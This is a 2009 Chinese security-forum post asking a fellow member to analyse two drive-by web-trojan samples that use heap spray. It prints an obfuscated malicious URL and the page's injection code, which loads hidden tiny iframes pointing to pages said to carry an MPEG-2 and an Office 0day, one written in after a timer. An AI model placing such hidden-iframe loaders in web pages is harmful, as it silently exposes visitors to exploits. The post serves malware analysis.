-
-
[讨论]关于两个流行0day网马样本分析
-
发表于:
2009-7-15 00:02
25846
-
failwest兄:
您好,仔细拜读了您的大作,书中对于heap spray技术的论述很精彩,但是深度还不够,例子太少了.在最近流行的几个0day网马中,该技术发挥的淋漓尽致,但是有些细节还是迷茫,我抓了2个0day网马样本,希望您能抽时间给示范分析一下好吗?
[NOTE]以下网页地址危险,请论坛会员不要随便点击!!!
681K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3N6Z5k6X3c8Y4K9r3N6V1k6$3S2V1i4K6u0W2j5$3&6Q4x3V1k6A6L8X3c8W2P5q4)9J5k6h3S2@1L8h3H3`.
<iframe src=[B]test.htm[/B] width=10 height=10></iframe>
<script>
pingfan = "<iframe src=[B]of.htm [/B]width=10 height=10></iframe>"
setTimeout("document.write(pingfan)", 8000 );
</script>
NOTE:
test.htm- MPEG-2视频漏洞0day
of.htm - 最新Office漏洞0day
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课